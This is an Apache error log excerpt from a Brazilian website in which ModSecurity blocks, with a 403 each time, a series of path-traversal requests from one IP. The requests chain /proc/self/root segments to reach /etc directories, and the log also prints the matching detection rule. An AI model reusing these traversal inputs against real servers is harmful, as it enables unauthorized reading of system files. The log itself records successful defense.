"abrBgtY0UrI5A3LftIy_6gAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:17.884306 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:57452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBhSmAPhZkrhU8w4l9DwAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:19.218609 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:57456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBh0zinOy1jxa1j4clhgAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:22.730969 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:46862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBisdf6f5d65gmYZTkbwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:24.028356 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:46866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBjOw_le52K8_3pV3ukAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:26.367205 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:46876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBjsdf6f5d65gmYZTkcgAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:28.834789 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:46878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBkNY0UrI5A3LftIy_8gAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:33.433831 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:59354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBlfu8EFLIOrSqIpsTTwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:35.880054 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:59362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBl9Y0UrI5A3LftIy_9QAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:38.300929 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:59364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBmUzinOy1jxa1j4clkAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:39.812254 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:57574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBm9a6ubjKNq_cu4arkgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:41.163228 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:57584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBncdf6f5d65gmYZTkegAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:43.394552 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:57590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBnsdf6f5d65gmYZTkewAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:44.935452 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:57594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBoOyqAr6etmhZHNrTrQAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:52.238957 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:57600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBqNa6ubjKNq_cu4aroAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:53.532175 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:40304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBqcdf6f5d65gmYZTkgAAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:15:59.165813 2026] [mime_magic:error] [pid 31803:tid 140411565680384] (70014)End of file found: [client 57.141.18.109:40698] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:16:05.927526 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:40316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBtdY0UrI5A3LftIzADAAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:07.275452 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:43768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBt9Y0UrI5A3LftIzADgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:09.178042 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:43770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBuOyqAr6etmhZHNrTswAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:10.535794 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:38516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBugkwaGbbGflqUZAf-wAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:11.927312 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:38520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBu-w_le52K8_3pV3unwAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:13.742610 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:38526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBvdY0UrI5A3LftIzADwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:15.343076 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:38532] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBv9Y0UrI5A3LftIzAFgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
